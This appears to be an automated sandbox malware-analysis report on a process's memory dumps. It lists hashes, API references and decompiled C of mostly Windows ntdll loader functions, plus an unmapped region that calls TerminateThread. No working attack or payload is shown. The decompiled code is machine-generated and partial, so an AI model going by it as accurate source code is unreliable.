Instruction ID: 62dc397f420c8ae091f274ed5cf12cf29a27de8808c1c89216f3382ed4827c1d
Opcode Fuzzy Hash: 7a70f11b48db18142b026adfe4be962d00f48ac03a60a56166925d71360f907d
Instruction Fuzzy Hash: F090027120100413D111616A8514F0B004D57D0681FD1C512E042451CDD6968956B161

Uniqueness

Uniqueness Score: -1.00%

Function 1E279840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E27984A

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b587909f0591603f6c63b87d56df8d30d87178822897338e123ac951a8f2cf6c
Instruction ID: c1a2040f4421034f1f01352ca2ffe97e6ec0937b8a823362efc9819151ed924c
Opcode Fuzzy Hash: b587909f0591603f6c63b87d56df8d30d87178822897338e123ac951a8f2cf6c
Instruction Fuzzy Hash: FA900271242041535545B16A8414D0B404A67E06817D1C112E1414914CC566985AE661

Uniqueness

Uniqueness Score: -1.00%

Function 1E2798F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E2798FA

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bb68cab729c4567072ef9f8ebc915c889c9dfce456a19aba05c33712ca1d6fa3
Instruction ID: fcefbcea8370e9bb34a8e978b6d38a9e7ba219bde0cb0797c88b6045757f3b39
Opcode Fuzzy Hash: bb68cab729c4567072ef9f8ebc915c889c9dfce456a19aba05c33712ca1d6fa3
Instruction Fuzzy Hash: 6090027160100503D101716A8414E1A004E57D0681FD1C122E1024519ECA658996B171

Uniqueness

Uniqueness Score: -1.00%

Function 1E279910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E27991A

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bec5f91a89cb56c815095cce05a436ed3eb937a6f17ffe64604f2c407bb5788a
Instruction ID: 3857f265dd36a5d65d1920c3c82d0937ff039d9f65c4070ba5f05176dd76b243
Opcode Fuzzy Hash: bec5f91a89cb56c815095cce05a436ed3eb937a6f17ffe64604f2c407bb5788a
Instruction Fuzzy Hash: 919002B120100403D140716A8414F4A004957D0741F91C111E5064518EC6998DD976A5

Uniqueness

Uniqueness Score: -1.00%

Function 1E2799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E2799AA

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5ed344932b9e3ebeed797a52c6245eb53e9c4ad18b3ba1aaf7f1375c7fe6739f
Instruction ID: 05cdc09855b199ba791fde2f3103e4fdb213cd5429a3fe2a3870107e0cd94190
Opcode Fuzzy Hash: 5ed344932b9e3ebeed797a52c6245eb53e9c4ad18b3ba1aaf7f1375c7fe6739f
Instruction Fuzzy Hash: 599002B134100443D100616A8424F0A004997E1741F91C115E1064518DC659CC567166

Uniqueness

Uniqueness Score: -1.00%

Function 0058042D, Relevance: 1.6, APIs: 1, Instructions: 129threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(000000FE,00000000), ref: 0058067B

Memory Dump Source

Source File: 0000000A.00000002.546587324.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 2721df89dc2332be63a0019ada7684ce8c8fc558cb6c17b681eea87d6d10b073
Instruction ID: f3e66d0bf28b90354969ad47f039e3a3e8094654be40eac1e49820dca8b105a7
Opcode Fuzzy Hash: 2721df89dc2332be63a0019ada7684ce8c8fc558cb6c17b681eea87d6d10b073
Instruction Fuzzy Hash: 1A31B2E22780D60D8F4B05306C6E1F9BF5CC7D6C1674CAAE881E20F955D686A39F63A4

Uniqueness

Uniqueness Score: -1.00%

Function 005801F4, Relevance: 1.6, APIs: 1, Instructions: 125threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(000000FE,00000000), ref: 0058067B

Memory Dump Source

Source File: 0000000A.00000002.546587324.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 95fb7fdb6b6c174e96914a246580a2207110ac574a78ae28f267a10c2ff6683c
Instruction ID: f46896e76b16f37b46998fbf8fe9c1e0cf2c456831d664b40a1325ea00d9f4f0
Opcode Fuzzy Hash: 95fb7fdb6b6c174e96914a246580a2207110ac574a78ae28f267a10c2ff6683c
Instruction Fuzzy Hash: E13175E21780D60D8F470A306C6E1F9BF6CCBD6C1674CAAD885E20F915D686639F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 0058030A, Relevance: 1.6, APIs: 1, Instructions: 125threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(000000FE,00000000), ref: 0058067B

Memory Dump Source

Source File: 0000000A.00000002.546587324.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: dd537eb7500249075ef812441e6de679051afc87a3b6bdc786514fdbc90f8545
Instruction ID: 9d95e99d672511a6f96a4930379a679221c1e5e957609f73dc8216577827d577
Opcode Fuzzy Hash: dd537eb7500249075ef812441e6de679051afc87a3b6bdc786514fdbc90f8545
Instruction Fuzzy Hash: DF31F7E21780D60D8F4706306C6E1F9BF5CCBD6C1674CAAD881E10F955D686639F53A4

Uniqueness

Uniqueness Score: -1.00%

Function 00580568, Relevance: 1.6, APIs: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(000000FE,00000000), ref: 0058067B

Memory Dump Source

Source File: 0000000A.00000002.546587324.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 0916ce4dec02bf59a4c99807999984856399e3f33ec53884e88174ab3bd0a6a0
Instruction ID: f1116b45cfbce6cb1a575f4644b1249e55d2133a3d15a29d2477cc195353f4f4
Opcode Fuzzy Hash: 0916ce4dec02bf59a4c99807999984856399e3f33ec53884e88174ab3bd0a6a0
Instruction Fuzzy Hash: 843165E21780D60D8F470630686E1F9BF6CCBD6C1674CA9D881E10FD15D696639F53A4

Uniqueness

Uniqueness Score: -1.00%

Function 005801EA, Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(000000FE,00000000), ref: 0058067B

Memory Dump Source

Source File: 0000000A.00000002.546587324.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 4f9308065c7db4da5c9e5af63b2d0387f8b7bd4d0547f7ae1661cb8fdc2ef3f4
Instruction ID: 86fe45d262a5845602803f5f4948a9b828220f795d5d912a1f74768e848e8c94
Opcode Fuzzy Hash: 4f9308065c7db4da5c9e5af63b2d0387f8b7bd4d0547f7ae1661cb8fdc2ef3f4
Instruction Fuzzy Hash: 8DD0A7351862159DEFB47E189DD47A42E10BF51320F7466139E13661D0E2E1448CA727

Uniqueness

Uniqueness Score: -1.00%

Function 1E27967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E279694

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2937cb1cbcd215167b44e3060c1e84b0c3a6b247cf063f151912b89eb3f4cefa
Instruction ID: 911e32afd34ad969afb8d471599f085e94460a75eb4f6eecf4e889c7f8fbbaea
Opcode Fuzzy Hash: 2937cb1cbcd215167b44e3060c1e84b0c3a6b247cf063f151912b89eb3f4cefa
Instruction Fuzzy Hash: 68B09B71D055C6C7D601D7714619F1B7A4577E0741F67C251D1030645E4778C095F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1E268E00, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126
timeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E1E268E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1e32d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1e328464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1e325780 & 0x00000003) != 0) {
							E1E2B5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1e325780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E1E27B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1e327984; // 0x882ba8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1e328464; // 0x74790110
					 *0x1e32b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E1E269B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1e325780 & 0x00000005) != 0) {
						_push(_t49);
						E1E2B5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x1e268e0f
0x1e268e16
0x1e268e19
0x1e268e1b
0x1e268e21
0x1e268e7f
0x1e268e85
0x1e2a9354
0x1e2a936c
0x1e2a9371
0x1e2a937b
0x1e2a9381
0x1e2a9381
0x1e2a937b
0x1e268e9d
0x1e268e9d
0x1e268e29
0x1e268e2c
0x1e268e38
0x1e268e3e
0x1e268e43
0x1e268eb5
0x1e268eb9
0x1e2a92aa
0x1e2a92af
0x1e2a92e8
0x1e2a92e8
0x1e2a92af
0x1e268eb9
0x1e268e45
0x1e268e53
0x1e268e5b
0x1e268e5f
0x1e268e78
0x1e268e78
0x1e268e7d
0x1e268ec3
0x1e268ecd
0x1e268ed2
0x1e268ed2
0x1e268ec5
0x1e268ec5
0x00000000
0x1e268e7d
0x1e268e67
0x1e268ea4
0x1e2a931a
0x00000000
0x00000000
0x1e2a9320
0x1e268ea4
0x1e268e70
0x1e2a9325
0x1e2a9340
0x1e2a9345
0x1e2a9345
0x1e268e76
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1E268E53

Strings

Querying the active activation context failed with status 0x%08lx, xrefs: 1E2A9357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E2A932A
minkernel\ntdll\ldrsnap.c, xrefs: 1E2A933B, 1E2A9367
LdrpFindDllActivationContext, xrefs: 1E2A9331, 1E2A935D

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 2366c7f8894dc6db35deea7196f4ae1f7df35ae99495dff3e2484d698d9eeae1
Instruction ID: d1e12315a32b1945c3dac787eeb96653a249bfbf7d47510df25512d10bc2d934
Opcode Fuzzy Hash: 2366c7f8894dc6db35deea7196f4ae1f7df35ae99495dff3e2484d698d9eeae1
Instruction Fuzzy Hash: FA4126B1E10257AFDB199B0588B8B6AF2A6BB4C344F264329FD0957151E7F06DC0C281

Uniqueness

Uniqueness Score: -1.00%

Function 1E30E824, Relevance: 6.5, APIs: 4, Instructions: 493
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E1E30E824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x1e32d360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L1E25FAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E1E25FA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x1e32b1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E1E252280(E1E27F3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														E1E24FFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x1e32b1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return E1E27B640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E1E26F3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x1e32b1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x1e32b1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = E1E30E7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(E1E30E7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(E1E30E7A8(_t38) == 0) {
									_t406 = 0;
								}
								E1E25FA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = E1E30E7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}

0x1e30e833
0x1e30e839
0x1e30e83e
0x1e30e841
0x1e30e848
0x1e30e84b
0x1e30e851
0x1e30e8b2
0x1e30e8b2
0x1e30e8b5
0x1e30e90b
0x1e30e911
0x1e30e913
0x1e30e913
0x1e30e91a
0x1e30e91d
0x1e30e922
0x1e30e924
0x1e30e924
0x1e30e924
0x1e30e92f
0x1e30e933
0x1e30e935
0x1e30e93a
0x1e30e940
0x1e30e948
0x1e30e950
0x1e30e955
0x00000000
0x00000000
0x1e30e957
0x1e30e95c
0x1e30e9cb
0x1e30e9d2
0x1e30e9d4
0x1e30e9f2
0x1e30e9f6
0x1e30ea10
0x1e30ea18
0x1e30ea1a
0x1e30ea1f
0x1e30ea2c
0x1e30ea2d
0x1e30ea2e
0x1e30ea32
0x1e30ea3d
0x1e30ea42
0x1e30ea45
0x1e30ea51
0x1e30ea60
0x1e30ea65
0x1e30ea68
0x1e30ea6a
0x1e30ea6a
0x1e30ea6a
0x1e30ea6f
0x1e30ea76
0x1e30ea7c
0x1e30ea7e
0x1e30ea81
0x1e30ea85
0x1e30ea88
0x1e30ea8c
0x1e30ea8f
0x1e30ea93
0x1e30ea98
0x00000000
0x00000000
0x1e30ea9a
0x1e30ea9d
0x1e30eaa2
0x1e30eb0e
0x1e30eb15
0x1e30eb17
0x1e30eb33
0x1e30eb36
0x1e30eb39
0x1e30eb3f
0x1e30eb45
0x1e30eb4a
0x1e30eb52
0x1e30ecb1
0x1e30ecb9
0x1e30ecbe
0x1e30ecc3
0x1e30ecc6
0x1e30eceb
0x1e30ecee
0x1e30ecf9
0x1e30ecfe
0x1e30ed00
0x1e30ed05
0x1e30ed07
0x1e30ed0a
0x1e30ed0c
0x1e30ed0e
0x1e30ed12
0x1e30ed19
0x1e30ed1e
0x1e30ed24
0x1e30ed2a
0x1e30ed2a
0x1e30ed2c
0x1e30ed3e
0x1e30ed3e
0x1e30eb5a
0x1e30eb62
0x1e30eb69
0x00000000
0x00000000
0x1e30eb6f
0x1e30eb75
0x1e30eb79
0x1e30eb79
0x1e30eb88
0x1e30eb8e
0x1e30eb90
0x1e30eb92
0x1e30eb97
0x1e30ed3f
0x1e30ed45
0x00000000
0x00000000
0x1e30ed4b
0x1e30ed4e
0x00000000
0x1e30eb9d
0x1e30eb9d
0x1e30eb9d
0x1e30eba2
0x1e30ebb5
0x1e30ebbc
0x1e30ebbe
0x1e30ebbe
0x1e30ebc3
0x1e30ebc5
0x1e30ebcb
0x1e30ebd2
0x1e30ebd5
0x1e30ebdb
0x1e30ebdf
0x1e30ebe1
0x1e30ebf0
0x1e30ebf9
0x1e30ec04
0x1e30ec07
0x1e30ec0a
0x1e30ec82
0x1e30ec85
0x1e30ec8b
0x1e30ec91
0x1e30ec93
0x1e30ec96
0x1e30ec9b
0x1e30eca6
0x1e30ecac
0x1e30ecae
0x1e30ecae
0x00000000
0x00000000
0x00000000
0x00000000
0x1e30ec0c
0x1e30ec0c
0x1e30ec0c
